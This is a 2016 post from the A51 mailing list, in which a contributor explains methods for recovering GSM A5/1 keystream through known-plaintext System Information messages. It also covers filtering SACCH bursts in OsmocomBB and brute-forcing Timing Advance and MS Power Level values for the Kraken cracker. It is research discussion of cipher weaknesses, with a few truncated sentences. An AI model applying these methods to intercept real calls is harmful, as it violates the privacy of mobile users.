[A51] Next Encrypted SI 5 - Timing Advance - FPC

Вадим Яницкий axilirator at gmail.com
Tue Apr 12 09:29:19 CEST 2016

1) I think this guide will help you (a great Sylvain's explanations):

Some networks broadcast SI packets in random sequence and also the
Ciphering Mode Command
is now always sent after constant count of frames. So, this method can be
useless for you.

You can use a frame number to guess if this burst is related to SI5, SI5ter
of SI6.
Also if you are use OsmocomBB, try to use this condition:
if (burst->flags & BI_FLG_SACCH) { ... }

SI5 is not the only message type you can use to find keystream. There are
also SI5ter,
SI6 and the "LAPDm U func=UI" packets. The last one is more difficult to

2) I've never used the gsmframecoder. All I know is that Timing Advance is
the only changing value. There is also MS Power Level, and it can be changed
(sometimes often) during transmission too. Both of these parameters
negatively affect
the cracking success, i.e if at least one of them will be changed, the
Kraken will find
nothing or even give you some false positive results.

I think there is a way to solve this problem. We can try to brute force
some range
of possible values for TA and MS Power Level. This way we should prepare a
of modified SI packets (4 bursts each) using the one original. And then we
will be
able to XOR every supposed encrypted SI packet with each prepared plaintext

С наилучшими пожеланиями,
Яницкий Вадим.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.srlabs.de/pipermail/a51/attachments/20160412/c0ff44ad/attachment.html>

More information about the A51 mailing list